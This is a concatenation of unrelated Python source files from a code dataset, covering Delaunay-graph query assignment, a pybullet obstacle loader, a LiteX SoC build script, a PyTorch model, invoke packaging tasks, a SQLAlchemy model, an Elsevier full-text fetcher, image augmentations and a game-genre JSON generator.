query_points_comp_labels,
considered_comp_idx_list,
) = self.assign_query_points_to_components(
init_data,
query_data,
G,
consider_several_assignments=consider_several_assignments,
)
logger.debug("Query points assigned to connected components")
print(
"- qDCA assignment to components executed, results saved to: {0}.".format(
self.results_dir
)
)
return query_points_comp_labels, considered_comp_idx_list
elif assign_to_RE:
query_points_nclosest_init_point_idxs = (
self.assign_query_points_to_closest_init_point(
init_data, query_data, return_len=return_len
)
)
logger.debug("Query points assigned to closest RE point")
print(
"- qDCA assignment to closest RE executed, results saved to: {0}.".format(
self.results_dir
)
)
return query_points_nclosest_init_point_idxs
elif assign_to_R:
query_points_nclosest_init_point_idxs = (
self.assign_query_points_to_closest_init_point(
init_data, query_data, assign_to_R=True
)
)
logger.debug("Query points assigned to closest R point")
print(
"- qDCA assignment to closest R executed, results saved to: {0}.".format(
self.results_dir
)
)
return query_points_nclosest_init_point_idxs
else:
raise ValueError(
"Query pont processing format not specified, choose one option."
)
@logger_time
def assign_query_points_to_components(
self,
init_data: REData,
query_data: QueryData,
G: DelaunayGraph,
consider_several_assignments: bool = False,
):
"""
Assigns query points to fundamental components.
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:param G: existing distilled Delaunay graph.
:param consider_several_assignments: whether to consider fliexible assignment.
:return: dataframe of query point indices and the associated assignments;
indices of fundamental components.
"""
# Compute average edge length of each component
comp_distances_df, considered_comp_idx_list = G.get_component_edge_len(
self.GeomCA_params.comp_consistency_threshold,
self.GeomCA_params.comp_quality_threshold,
)
self.save_DCA_logs(G)
logger.debug("Average edge length per (non-trivial) component extracted")
print("- Delaunay edges to query points obtained.")
# Remove query edges connecting to outliers defined by HDBSCAN
query_edges_df = self.get_query_Delaunay_edges_stats(init_data, query_data)
query_edges_to_components_df = query_edges_df[
query_edges_df["label"] < G.first_trivial_component_idx
]
logger.debug("Average edge length per (non-trivial) component extracted")
# For each query point and component it is connected to:
# get the shortest edge length to each component and number of edges connecting
# to that component
df = (
query_edges_to_components_df.groupby(["query_idx", "label"])[["len"]]
.agg(["min", "count"])
.reset_index()
)
df.columns = df.columns.droplevel(0)
df.reset_index()
df.columns = ["query_idx", "label", "len", "init_idx_count"]
# Merge with the range of component edges from the distilled Delaunay graph
df = df.join(comp_distances_df, on="label")
# Extract query points whose shortest edges fall within the edge length range
# of the corresponding component
df_component_assignment = df[df.len <= df.mean_plus_std]
num_comp_assignments = (
df_component_assignment.groupby(["query_idx"])["label"]
.count()
.to_frame()
.rename(columns={"label": "num_comp_assignments"})
)
df_component_assignment = df_component_assignment.join(
num_comp_assignments, on="query_idx"
)
# Conservative assignment:
# Extract only those points that belong to one component
num_Q = query_data.num_Q
query_points_comp_assignment = (
df_component_assignment[df_component_assignment.num_comp_assignments == 1][
["query_idx", "label"]
]
.to_numpy()
.astype(int)
)
# Flexible assignment:
# Extract those points that are assigned to more components
if consider_several_assignments:
two_assignments = df_component_assignment[
df_component_assignment.num_comp_assignments >= 2
]
two_assignments_sorted_by_len = two_assignments.sort_values(
by=["query_idx", "len"]
)
extra_assignments_by_len = two_assignments_sorted_by_len.drop_duplicates(
subset=["query_idx"], keep="first"
)
two_assignments_sorted_by_num_edges = two_assignments.sort_values(
by=["query_idx", "init_idx_count"]
)
extra_assignments_by_num_edges = (
two_assignments_sorted_by_num_edges.drop_duplicates(
subset=["query_idx"], keep="last"
)
)
extras = pd.merge(
extra_assignments_by_len,
extra_assignments_by_num_edges,
how="inner",
on=list(extra_assignments_by_num_edges),
)
assert (
np.intersect1d(
extras["query_idx"], query_points_comp_assignment[:, 0]
).size
== 0
)
extra_labels = extras[["query_idx", "label"]].astype(int).to_numpy()
query_points_comp_assignment = np.concatenate(
[query_points_comp_assignment, extra_labels]
)
query_points_comp_assignment[:, 0] -= init_data.num_R + init_data.num_E
not_assigned_idx = np.setdiff1d(
np.arange(num_Q), query_points_comp_assignment[:, 0]
)
not_assigned = np.array(
[not_assigned_idx, np.repeat(-1, len(not_assigned_idx))]
).T
query_points_comp_labels = np.concatenate(
[query_points_comp_assignment, not_assigned]
)
query_points_comp_labels = query_points_comp_labels[
np.argsort(query_points_comp_labels[:, 0])
]
# Save the assignment results
np.save(
os.path.join(
self.results_dir, query_data.query_input_array_comp_assignment_filename
),
query_points_comp_labels,
)
np.save(
os.path.join(
self.results_dir,
query_data.query_input_array_considered_comp_list_filename,
),
np.array(considered_comp_idx_list),
)
return query_points_comp_labels, considered_comp_idx_list
@logger_time
def assign_query_points_to_closest_init_point(
self,
init_data: REData,
query_data: QueryData,
n_closest: int = 1,
assign_to_R: bool = False,
return_len: bool = False,
):
"""
Assigns query points to closest R (and E) point.
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:param n_closest: number of closest neighbours to consider.
:param assign_to_R: whether to assign query points to R points only.
:param return_len: whether to return the length of the shortest edges.
:return: dataframe of query point indices and the associated assignments.
"""
query_edges_df = self.get_query_Delaunay_edges_stats(init_data, query_data)
query_edges_df.query_idx -= init_data.num_R + init_data.num_E
# Whether to consider edges to E points or not
if assign_to_R:
query_edges_df = query_edges_df[query_edges_df.init_idx < init_data.num_R]
if n_closest > 1:
nclosest_init_point_list = []
for query_idx in query_edges_df.query_idx.unique():
nclosest_init_idxs = (
query_edges_df[query_edges_df.query_idx == query_idx]
.nsmallest(n_closest, "len")["init_idx"]
.to_numpy()
.astype(int)
)
nclosest_init_idxs = np.insert(nclosest_init_idxs, 0, int(query_idx))
# Pad if not enough neighbours
nclosest_init_idxs = np.pad(
nclosest_init_idxs,
(0, max(n_closest + 1 - len(nclosest_init_idxs), 0)),
mode="constant",
constant_values=-1,
)
nclosest_init_point_list.append(nclosest_init_idxs)
query_points_nclosest_init_point_idxs = np.stack(nclosest_init_point_list)
np.save(
os.path.join(
self.results_dir,
query_data.query_input_array_point_assignment_filename,
),
query_points_nclosest_init_point_idxs,
)
return query_points_nclosest_init_point_idxs
else:
# Find closest
df = query_edges_df.loc[
query_edges_df.groupby(["query_idx"])["len"].idxmin()
]
if return_len:
query_points_closest_init_point_idxs = (
df[["query_idx", "init_idx", "len"]].to_numpy().astype(float)
)
else:
query_points_closest_init_point_idxs = (
df[["query_idx", "init_idx"]].to_numpy().astype(int)
)
np.save(
os.path.join(
self.results_dir,
query_data.query_input_array_point_assignment_filename,
),
query_points_closest_init_point_idxs,
)
return query_points_closest_init_point_idxs
@logger_time
def get_query_Delaunay_edges_stats(self, init_data: REData, query_data: QueryData):
"""
Extracts graph neighbourhood of each query point.
:param init_data: R and E data parameters.
:param query_data: query data parameters.
:return: dataframe of query point indices and the associated neughbourhood.
"""
Delaunay_edges_stats_filepath = os.path.join(
self.logs_dir, query_data.query_input_array_edges_stats_filename
)
try:
query_edges_df = pd.read_pickle(Delaunay_edges_stats_filepath)
        except Exception:  # no cached stats yet: recompute the query edges below
# Extract query Delaunay edges
graph_utils._approximate_query_Delaunay_edges(
self.logs_dir,
os.path.join(self.root, init_data.input_array_filepath),
os.path.join(self.root, query_data.query_input_array_filepath),
self.graph_params,
)
logger.debug("Unfiltered query Delaunay edges extracted")
# Filter query edges as in the initial approximated Delaunay graph
if self.graph_params.sphere_coverage == 1.0:
query_Delaunay_edges = np.load(
os.path.join(
self.logs_dir, self.graph_params.query_unfiltered_edges_filename
)
)[:, :2]
query_Delaunay_edges_len = np.load(
os.path.join(
self.logs_dir,
self.graph_params.query_unfiltered_edges_len_filename,
)
)
else:
graph_utils._filter_Delaunay_edges(
os.path.join(
self.logs_dir, self.graph_params.query_unfiltered_edges_filename
),
os.path.join(
self.logs_dir,
self.graph_params.query_unfiltered_edges_len_filename,
),
self.graph_params,
os.path.join(
self.logs_dir, self.graph_params.query_filtered_edges_filename
),
os.path.join(
self.logs_dir,
self.graph_params.query_filtered_edges_len_filename,
),
n_points=init_data.num_R + init_data.num_E,
n_query_points=query_data.num_Q,
)
query_Delaunay_edges = np.load(
os.path.join(
self.logs_dir, self.graph_params.query_filtered_edges_filename
)
)
query_Delaunay_edges_len = np.load(
os.path.join(
self.logs_dir,
self.graph_params.query_filtered_edges_len_filename,
)
)
logger.debug("query Delaunay edges extracted")
# Get component idx (label) that each query edge connects to and its length
input_array_comp_labels = np.load(
os.path.join(
self.root, self.clustering_params.input_array_labels_filepath
)
)
query_edges_array = np.stack(
[
query_Delaunay_edges[:, 0],
query_Delaunay_edges[:, 1],
input_array_comp_labels[query_Delaunay_edges[:, 1]],
query_Delaunay_edges_len.squeeze(),
],
axis=1,
).astype(np.float32)
query_edges_df = pd.DataFrame(
data=query_edges_array,
columns=["query_idx", "init_idx", "label", "len"],
).astype(float)
query_edges_df.to_pickle(
os.path.join(
self.logs_dir, query_data.query_input_array_edges_stats_filename
)
)
return query_edges_df
| StarcoderdataPython |
1797927 | import pybullet as p
class Obstacle(object):
def __init__(self, urdf_file, position, scale=1.0) -> None:
self.body_id = p.loadURDF(urdf_file, position, globalScaling=scale)
def __del__(self):
p.removeBody(self.body_id)
@staticmethod
def load_obstacle(obstacle):
return Obstacle(obstacle['urdf_file'], obstacle['position'], obstacle['scale'])
@staticmethod
def load_obstacles(obstacles):
return list(Obstacle.load_obstacle(obstacle) for obstacle in obstacles)
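# Usage sketch (the dict keys mirror load_obstacle above; the URDF paths and values
# are illustrative, and a pybullet connection, e.g. p.connect(p.DIRECT), is assumed
# to exist already):
#
#   obstacles = [
#       {'urdf_file': 'plane.urdf', 'position': [0, 0, 0], 'scale': 1.0},
#       {'urdf_file': 'cube.urdf', 'position': [1, 0, 0.5], 'scale': 0.5},
#   ]
#   loaded = Obstacle.load_obstacles(obstacles)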
| StarcoderdataPython |
1729432 | <reponame>daveshah1/linux-on-litex-vexriscv
#!/usr/bin/env python3
import argparse
from migen import *
from litex.boards.targets import arty
from litex.soc.interconnect import wishbone
from litex.soc.integration.soc_core import mem_decoder
from litex.soc.integration.builder import Builder
from litex.soc.cores.spi_flash import SpiFlash
# LinuxSoC -----------------------------------------------------------------------------------------
class LinuxSoC(arty.EthernetSoC):
csr_map = {
"ddrphy": 16,
"cpu": 17,
"ethphy": 18,
"ethmac": 19
}
csr_map.update(arty.EthernetSoC.csr_map)
arty.EthernetSoC.mem_map = {
"rom": 0x00000000,
"sram": 0x10000000,
"emulator_ram": 0x20000000,
"ethmac": 0x30000000,
"spiflash": 0x50000000,
"main_ram": 0xc0000000,
"csr": 0xf0000000,
}
def __init__(self):
arty.EthernetSoC.__init__(self, cpu_type="vexriscv", cpu_variant="linux")
self.cpu.use_external_variant("VexRiscv.v")
self.add_constant("NETBOOT_LINUX_VEXRISCV", None)
# machine mode emulator ram
self.submodules.emulator_ram = wishbone.SRAM(0x4000)
self.register_mem("emulator_ram", self.mem_map["emulator_ram"], self.emulator_ram.bus, 0x4000)
# spiflash
spiflash_pads = self.platform.request("spiflash4x")
spiflash_pads.clk = Signal()
self.specials += Instance("STARTUPE2",
i_CLK=0,
i_GSR=0,
i_GTS=0,
i_KEYCLEARB=0,
i_PACK=0,
i_USRCCLKO=spiflash_pads.clk,
i_USRCCLKTS=0,
i_USRDONEO=1,
i_USRDONETS=1)
self.submodules.spiflash = SpiFlash(
spiflash_pads,
dummy=11,
div=2,
endianness=self.cpu.endianness)
self.add_wb_slave(mem_decoder(self.mem_map["spiflash"]), self.spiflash.bus)
self.add_memory_region("spiflash", self.mem_map["spiflash"] | self.shadow_base, 0x1000000)
self.add_constant("FLASHBOOT_LINUX_VEXRISCV", None)
self.add_constant("FLASH_BOOT_ADDRESS", None)
# Build / Load / Flash -----------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="Linux on LiteX-VexRiscv")
parser.add_argument("--build", action="store_true", help="build bitstream")
parser.add_argument("--load", action="store_true", help="load bitstream (SRAM)")
parser.add_argument("--flash", action="store_true", help="flash bitstream (SPI Flash)")
args = parser.parse_args()
if args.build:
soc = LinuxSoC()
builder = Builder(soc, output_dir="build")
builder.build()
if args.load:
from litex.build.openocd import OpenOCD
prog = OpenOCD("openocd/openocd_xilinx.cfg")
prog.load_bitstream("build/gateware/top.bit")
if args.flash:
flash_regions = {
"build/gateware/top.bin": "0x00000000", # FPGA image: automatically loaded at startup
"binaries/Image": "0x00400000", # Linux Image: copied to 0xc0000000 by bios
"binaries/rootfs.cpio": "0x00800000", # File System: copied to 0xc2000000 by bios
"binaries/rv32.dtb": "0x00f00000", # Device tree: copied to 0xc3000000 by bios
"emulator/emulator.bin": "0x00f80000", # MM Emulator: copied to 0x20000000 by bios
}
from litex.build.openocd import OpenOCD
prog = OpenOCD("openocd/openocd_xilinx.cfg",
flash_proxy_basename="openocd/bscan_spi_xc7a35t.bit")
prog.set_flash_proxy_dir(".")
for filename, base in flash_regions.items():
base = int(base, 16)
print("Flashing {} at 0x{:08x}".format(filename, base))
prog.flash(base, filename)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3230380 | <filename>models/conv.py<gh_stars>10-100
import torch
from layers import Conv2d, Linear
class ConvModel(torch.nn.Module):
def __init__(self, in_channels: int, out_channels: int, dropout: bool = True):
super().__init__()
self.features = torch.nn.Sequential(
Conv2d(in_channels, 32, 3, padding=1),
torch.nn.ReLU(),
torch.nn.MaxPool2d(2),
Conv2d(32, 64, 3, padding=1),
torch.nn.ReLU(),
torch.nn.MaxPool2d(2),
Conv2d(64, 128, 3, padding=1),
torch.nn.Dropout(0.25 if dropout else 0.0),
torch.nn.ReLU(),
torch.nn.MaxPool2d(2),
Conv2d(128, 256, 3, padding=1),
torch.nn.ReLU(),
torch.nn.Dropout(0.5 if dropout else 0.0)
)
        # final linear classifier over the globally pooled feature map
        self.out_layer = Linear(256, out_channels)
    def forward(self, inp: torch.Tensor) -> torch.Tensor:
        # global average pool over the spatial dimensions, then classify
        return self.out_layer(self.features(inp).mean(dim=(2, 3))) | StarcoderdataPython |
3373824 | from tests.base import BaseTestCase
from nose.plugins.attrib import attr
from shiftevent.event import Event
from shiftevent.handlers import Dummy1
@attr('event', 'handler', 'dummy1')
class Dummy1Test(BaseTestCase):
def test_instantiating_handler(self):
""" Instantiating dummy1 handler """
handler = Dummy1()
self.assertIsInstance(handler, Dummy1)
def test_handle_event(self):
""" Handler Dummy1 handles event"""
handler = Dummy1()
event = Event(
type='DUMMY_EVENT',
payload={'prop': 'val'}
)
event = handler.handle(event)
self.assertIn('dummy_handler1', event.payload)
def test_rollback_event(self):
""" Handler Dummy1 rolling back an event """
handler = Dummy1()
event = Event(
type='DUMMY_EVENT',
payload={'prop': 'val'}
)
event = handler.handle(event)
self.assertIn('dummy_handler1', event.payload)
handler.rollback(event)
self.assertNotIn('dummy_handler1', event.payload)
| StarcoderdataPython |
1720652 | """tasks.py
Simple tutorial invoke based task execution tool for building debian package (rpm support in process...) of ip2w application.
Use [invoke.yaml] config file or cli params (see @task specification)
Usage:
invoke builddeb --no-use-git | --use-git (default)
"""
import os
import time
import tempfile as tmp
from pathlib import Path
from shutil import copyfile
from invoke import task, context, Collection, Config
from git import Repo # https://gitpython.readthedocs.io/en/stable/
def git_update_ctx(source: Path, ctx: context.Context):
"Update ctx from git"
repo = Repo(source)
head_commit = repo.head.commit
# repo_config = repo.config_reader()
ctx.update({
"project": {
"url": repo.remotes.origin.url, # git remote get-url origin
"name": repo.remotes.origin.url.rstrip('.git').rpartition("/")[-1], # git remote get-url origin | xargs basename -s .git
"version": str(head_commit), # GIT_VERSION="$(git rev-list HEAD -n 1)"
"branch": head_commit.name_rev.split(" ")[-1], # BRANCH="$(git name-rev --name-only HEAD)"
"updated_date": head_commit.committed_date,
"author": head_commit.author.name, # $(git config user.name) <$(git config user.email)>
"author_email": head_commit.author.email,
}
})
def path_resolve(path, default_path) -> Path:
"Resolve path. if [path] is None or empty then [default_path]."
return Path(path or default_path).expanduser().resolve()
def get_existing_dir(directory: Path) -> Path:
"Return existing directory, create if it doesn't exist (full path with parents)."
if not directory.exists():
directory.mkdir(parents = True, exist_ok=True)
return directory
@task(help={
"source": "Source directory",
"config": "Config directory",
"debian": "DEBIAN directory",
"output": "Output .deb directory",
"use_git": "Use git to get project info",
}, optional=['use_git'])
def build_deb(ctx, source = None, config = None, debian = None, output = None, use_git = None):
"Build .deb package."
source_path = ctx.config.deb.source = path_resolve(source, ctx.config.deb.source)
config_path = ctx.config.deb.config = path_resolve(config, ctx.config.deb.config)
debian_path = ctx.config.deb.debian = path_resolve(debian, ctx.config.deb.debian)
output_path = ctx.config.deb.output = path_resolve(output, ctx.config.deb.output)
use_git = use_git or bool(ctx.config.deb.get('use_git', 'false'))
if use_git:
git_update_ctx(source_path, ctx)
# todo: add templates support
with tmp.TemporaryDirectory() as tmp_dir:
build_root_dir = Path(tmp_dir) # / ctx.config.project.name
with ctx.cd(build_root_dir):
build_project_dir = get_existing_dir(build_root_dir / ctx.config.project.name)
ctx.run(f'cp -r "{debian_path}" "{build_project_dir}"')
with open(debian_path / 'conffiles') as c_f:
conffiles = c_f.read()
files_to = dict((os.path.basename(file), build_project_dir.joinpath(file.lstrip("/"))) for file in conffiles.split())
files_from = dict((file.name, file) for src in [source_path, config_path] for file in src.iterdir() if file.is_file())
for file_name in files_from.keys() & files_to.keys():
files_to[file_name].parent.mkdir(parents=True, exist_ok=True)
copyfile(files_from[file_name], files_to[file_name])
deb_file = output_path / f'{ctx.config.project.name}-{ctx.config.project.version}.deb'
ctx.run(f"fakeroot dpkg -b ./{ctx.config.project.name} {deb_file}")
ctx.run("tree")
class SafeDict(dict):
"SafeDict to use in str.format_map"
def __missing__(self, key):
return '{' + key + '}'
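# e.g. "{name}-{version}".format_map(SafeDict(name="ip2w")) -> "ip2w-{version}";
# unknown placeholders are left in place instead of raising KeyError.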
def process_run_ctx(ctx, run_ctx):
""" Process run context as following:
working_dir: <working directory>
params:
param-name: <param-value>
...
run: [cmd list]
"""
working_dir = run_ctx.get("working_dir", os.getcwd())
with ctx.cd(working_dir):
ctx.run("pwd")
for run_cmd in run_ctx.get("run", []):
print(run_cmd.format_map(SafeDict(**run_ctx.get("params",{}))))
ctx.run(run_cmd.format_map(SafeDict(**run_ctx.get("params",{}))), echo=True, warn=True)
@task()
def build_rpm(ctx):
"Run ctx = ctx.rpm"
process_run_ctx(ctx, ctx.rpm)
@task()
def docker_build(ctx, target):
"Run ctx = ctx.docker.build[target]"
process_run_ctx(ctx, ctx.docker.build[target])
@task()
def docker_run(ctx, target):
"Run ctx = ctx.docker.run[target]"
process_run_ctx(ctx, ctx.docker.run[target])
@task()
def run_tests(ctx, target):
"Run ctx = ctx.tests[target]"
process_run_ctx(ctx, ctx.tests[target])
tasks_dir = os.path.dirname(__file__)
ns = Collection(build_deb, build_rpm, docker_build, docker_run, run_tests)
default_config = Config(defaults={
"run": {"pty": True},
"deb": {
'use_git': False,
'source': tasks_dir,
'config': os.path.join(tasks_dir, "builddeb", "config"),
'debian': os.path.join(tasks_dir, "builddeb", "DEBIAN"),
'output': os.path.join(tasks_dir, "builddeb")
},
"project": {
'name': "<project-name>",
'version': "<project-version",
'branch': "<project-branch>",
'updated_date': int(time.time()),
'author': "<project-author>",
'author_email': "<project-author>-email",
},
})
ns.configure(default_config)
| StarcoderdataPython |
157097 | from sqlalchemy import (
Column,
String,
DateTime
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql import func
from spendy.db.utils import get_db_engine
Base = declarative_base()
class BankAccount(Base):
__tablename__ = 'bank_accounts'
id = Column(String(50), primary_key=True)
bank = Column(String(50))
owner = Column(String(50))
type = Column(String(50))
description = Column(String(100))
ledger_account = Column(String(100))
process_ts = Column(
DateTime(timezone=True),
server_default=func.now(),
onupdate=func.now()
)
def __repr__(self):
return f"<BankAccount(bank='{self.bank}', owner='{self.owner}', type={self.type})>"
if __name__ == "__main__":
db_engine = get_db_engine()
Base.metadata.create_all(db_engine)
| StarcoderdataPython |
1781132 | # scopus_fulltext_spider.py
import json
import logging
import typing as tg
import os
from ..dependencies.elsapy.elsdoc import FullDoc
from ..dependencies.elsapy.elsclient import ElsClient
class ScopusFulltextSpider:
    '''Retrieve the full text for a given DOI via Elsevier's full-text API.
    The retrieved full text is stored in XML format under the output_path directory.'''
def __init__(
self, doi: str,
filename=None,
output_path='./data/Scopus/',
config='./data_fetcher/scopus/config.json',
log_file='./data/ieee_fulltext_spider_log.txt'
) -> None:
        # initialise the spider from the JSON config file
con_file = open(config)
config = json.load(con_file)
con_file.close()
self._client = ElsClient(config['apikey'])
self._client.inst_token = config['insttoken']
self.doi = doi
self.doc = FullDoc(doi=doi)
self.output_path = output_path
if self.output_path[-1] not in ['/', '\\']:
self.output_path += '/'
self.filename = filename
if self.filename is None:
self.filename = doi.replace('/', '_').replace('\\', '_') + '.json'
        # set up a logger so failed fetches are recorded to log_file.
self._logger = logging.getLogger()
self._logger.setLevel(logging.WARNING)
format_str = logging.Formatter('%(asctime)s - %(filename)s - %(levelname)s: %(message)s')
fh = logging.FileHandler(filename=log_file)
fh.setFormatter(format_str)
self._logger.addHandler(fh)
def execute(self) -> tg.Optional[str]:
        '''Call the full-text retrieval API for the configured DOI.
        On success, write the result to the configured filename in the output folder and return the file path.
        On failure, log the error and return None.
        '''
succ = self.doc.read(els_client=self._client)
if succ:
            # full text found: save the retrieved document into the output folder
if not os.path.exists(self.output_path):
os.makedirs(self.output_path)
with open(self.output_path + self.filename, 'w', encoding='utf-8') as f:
f.write(str(self.doc.data))
return self.output_path + self.filename
err_msg = self.doc.err_msg
self._logger.error('ScopusFulltextSpider, getting doi = %s failed. Exception: %s', self.doi, str(err_msg))
return None
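# Usage sketch (the DOI below is purely illustrative; a config.json with valid
# "apikey" and "insttoken" entries is assumed to exist at the default path):
#
#   spider = ScopusFulltextSpider(doi='10.1016/j.example.2020.123456')
#   saved_path = spider.execute()  # file path on success, None on failure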
| StarcoderdataPython |
3244563 | # AUTOGENERATED! DO NOT EDIT! File to edit: 04_data.ipynb (unless otherwise specified).
__all__ = ['open_tif', 'MSTensorImage', 'BAND_STATS', 'bands', 'means', 'stds', 'Channelcopy', 'Channelaug',
'TrainTransform', 'ValTransform', 'trainaug', 'globalaug1', 'globalaug2', 'locaaug', 'val_pipe', 'aug',
'aug2', 'db']
# Cell
from fastai.vision.all import *
import skimage.io as skio
import warnings
warnings.filterwarnings("ignore")
import SSLRS.utils as utils
# Cell
def open_tif(fn, cls=torch.Tensor):
im = skio.imread(str(fn))/10000
im = im.transpose(1,2,0).astype('float32')
return im
class MSTensorImage(TensorImage):
@classmethod
def create(cls, data:(Path,str,ndarray), chnls=None):
        if isinstance(data, (Path, str)):
            # only .tif files are handled here; anything else would have left `im` unbound
            if str(data).endswith('tif'):
                im = open_tif(fn=data, cls=torch.Tensor)
            else:
                raise ValueError(f'Unsupported file type for MSTensorImage: {data}')
        elif isinstance(data, ndarray):
            im = torch.from_numpy(data)
        else:
            im = data
        return im
# Cell
BAND_STATS = {
'S2':{
'mean': {
'B01': 340.76769064,
'B02': 429.9430203,
'B03': 614.21682446,
'B04': 590.23569706,
'B05': 950.68368468,
'B06': 1792.46290469,
'B07': 2075.46795189,
'B08': 2218.94553375,
'B8A': 2266.46036911,
'B09': 2246.0605464,
'B11': 1594.42694882,
'B12': 1009.32729131
},
'std': {
'B01': 554.81258967,
'B02': 572.41639287,
'B03': 582.87945694,
'B04': 675.88746967,
'B05': 729.89827633,
'B06': 1096.01480586,
'B07': 1273.45393088,
'B08': 1365.45589904,
'B8A': 1356.13789355,
'B09': 1302.3292881,
'B11': 1079.19066363,
'B12': 818.86747235
}
},
'S1': {
'mean': {
'VV': -12.619993741972035,
'VH': -19.29044597721542,
'VV/VH': 0.6525036195871579,
},
'std': {
'VV': 5.115911777546365,
'VH': 5.464428464912864,
'VV/VH': 30.75264076801808,
},
'min': {
'VV': -74.33214569091797,
'VH': -75.11137390136719,
'R': 3.21E-2
},
'max': {
'VV': 34.60696029663086,
'VH': 33.59768295288086,
'R': 1.08
}
}
}
# Cell
bands=['B02','B03', 'B04', 'B05','B06', 'B07', 'B11', 'B08','B8A', 'B12']
means=[BAND_STATS['S2']['mean'][band]/10000 for band in bands]
stds=[BAND_STATS['S2']['std'][band]/10000 for band in bands]
# Cell
import albumentations as A
from albumentations.pytorch import ToTensorV2
from torchvision import transforms
from albumentations.core.transforms_interface import ImageOnlyTransform
import random
import cv2
class Channelcopy(ImageOnlyTransform):
def __init__(self, always_apply=False, p=0.5):
        super(Channelcopy, self).__init__(always_apply, p)
    def apply(self, img, **params):
        # pick one band at random and duplicate it across all 10 channels
        temp = img[:, :, random.randint(0, 9), np.newaxis]
        return np.repeat(temp, 10, axis=2)
class Channelaug(ImageOnlyTransform):
def __init__(self, always_apply=False, p=0.5):
super(Channelaug, self).__init__(always_apply, p)
def apply(self, img, **params):
result_img = np.empty_like(img)
for i in range(10):
shift=random.uniform(-0.2,0.2)
result_img[..., i] = img[..., i] + shift
result_img[result_img>1]=1
return result_img
trainaug=[]
# first global crop
globalaug1 = A.Compose([Channelaug(p=0.2),A.HorizontalFlip(p=0.5),
A.ShiftScaleRotate(p=.5),
A.RandomResizedCrop(120,120,scale=(0.4, 1.),always_apply=True),
A.GaussianBlur(p=1.0),
# A.Solarize(threshold=0.5),
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
# second global crop
globalaug2 = A.Compose([Channelaug(p=0.2),A.HorizontalFlip(p=0.5),
A.ShiftScaleRotate(p=.5),
A.RandomResizedCrop(120,120,scale=(0.4, 1.),always_apply=True),
A.GaussianBlur(p=0.1),
A.Solarize(threshold=0.5,p=0.2),
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
# transformation for the local small crops
locaaug = A.Compose([Channelaug(p=0.2),A.HorizontalFlip(p=0.5),
A.ShiftScaleRotate(p=.5),
A.RandomResizedCrop(56,56,scale=(0.05, 0.4),always_apply=True),
A.GaussianBlur(p=0.5),
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
trainaug.append(globalaug1)
trainaug.append(globalaug2)
for _ in range(6):
trainaug.append(locaaug)
val_pipe = A.Compose([
A.Normalize(mean=means,std=stds,max_pixel_value=1.0),
ToTensorV2()]
)
class TrainTransform(ItemTransform):
split_idx = 0
def __init__(self, aug,split=0):
self.aug = aug
# self.split_idx = split
def encodes(self, x):
result=[]
for i in range(len(self.aug)):
result.append(self.aug[i](image=x[0])['image'])
return result, x[1]
class ValTransform(ItemTransform):
split_idx = 1
def __init__(self, aug,split=0):
self.aug = aug
# self.split_idx = split
def encodes(self, x):
aug = self.aug(image=x[0])
# print(torch.cat((aug['image0'],aug['image1']),axis=0).shape)
return aug['image'], x[1]
# Create our class with this aug_pipe
aug = TrainTransform(trainaug)
aug2=ValTransform(val_pipe)
# Cell
db = DataBlock(blocks=(TransformBlock(type_tfms=partial(MSTensorImage.create)),CategoryBlock),
splitter=ColSplitter('Isval'),
get_x=ColReader('fname'),
get_y=ColReader('labels'),
item_tfms=[aug,aug2]
) | StarcoderdataPython |
134367 | __all__ = ['controle', 'modelo', 'view_ui'] | StarcoderdataPython |
3349147 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import datetime as DT
import json
from pathlib import Path
import shutil
import sys
sys.path.append('..')
sys.path.append('../genre_translate_file')
from db import Dump
from load import load
from common_utils import get_logger
from common import get_current_datetime_str
log = get_logger('generate_games.txt')
DIR = Path(__file__).parent.resolve()
FILE_NAME_GAMES = DIR / 'game_by_genres.json'
FILE_NAME_BACKUP = DIR / 'backup'
FILE_NAME_BACKUP.mkdir(parents=True, exist_ok=True)
# Example: "Action", "Adventure" -> "Action-adventure"
GENRE_COMPRESSION = [
("Action", "Adventure", "Action-adventure"),
("Action", "RPG", "Action/RPG"),
("First-person", "Shooter", "FPS"),
("Survival", "Horror", "Survival horror"),
]
def do_genres_compression(genres: list) -> list:
genres = sorted(set(genres))
to_remove = set()
for src_1, src_2, target in GENRE_COMPRESSION:
if src_1 in genres and src_2 in genres:
to_remove.add(src_1)
to_remove.add(src_2)
genres.append(target)
log.info(f'Compress genres {src_1!r} and {src_2!r} -> {target!r}')
for x in to_remove:
genres.remove(x)
return sorted(set(genres))
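# e.g. do_genres_compression(["Action", "Adventure", "Puzzle"])
# returns ["Action-adventure", "Puzzle"] (the first GENRE_COMPRESSION rule fires).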
log.info('Start.')
if FILE_NAME_GAMES.exists():
backup_file_name = str(
FILE_NAME_BACKUP / f'{get_current_datetime_str()}_{FILE_NAME_GAMES.name}'
)
shutil.copy(
FILE_NAME_GAMES,
backup_file_name
)
log.info(f'Save backup to: {backup_file_name}')
log.info('')
log.info('Loading cache...')
game_by_genres = load(FILE_NAME_GAMES)
log.info(f'game_by_genres ({len(game_by_genres)})')
new_game_by_genres = Dump.dump()
log.info(f'new_game_by_genres ({len(new_game_by_genres)})')
genre_translate = load()
log.info(f'genre_translate ({len(genre_translate)})')
log.info('Finish loading cache.')
log.info('')
log.info('Search games...')
number = 0
for game, genres in new_game_by_genres.items():
if game in game_by_genres:
continue
log.info(f'Added game {game!r} with genres: {genres}')
number += 1
new_genres = []
for x in genres:
tr_genres = genre_translate.get(x)
if not tr_genres: # null, [], ""
continue
if isinstance(tr_genres, str):
new_genres.append(tr_genres)
elif isinstance(tr_genres, list):
new_genres.extend(tr_genres)
else:
log.warning(f'Unsupported type genres {tr_genres} from {x!r}')
new_genres = do_genres_compression(new_genres)
log.info(f'Successful translate genres: {genres} -> {new_genres}')
game_by_genres[game] = new_genres
log.info('')
log.info(f'Finish search games. New games: {number}.')
log.info(f'Saving to {FILE_NAME_GAMES}')
json.dump(
game_by_genres,
open(FILE_NAME_GAMES, 'w', encoding='utf-8'),
ensure_ascii=False,
indent=4
)
log.info('Finish!')
| StarcoderdataPython |
1669558 | <filename>setup.py
#!/usr/bin/python
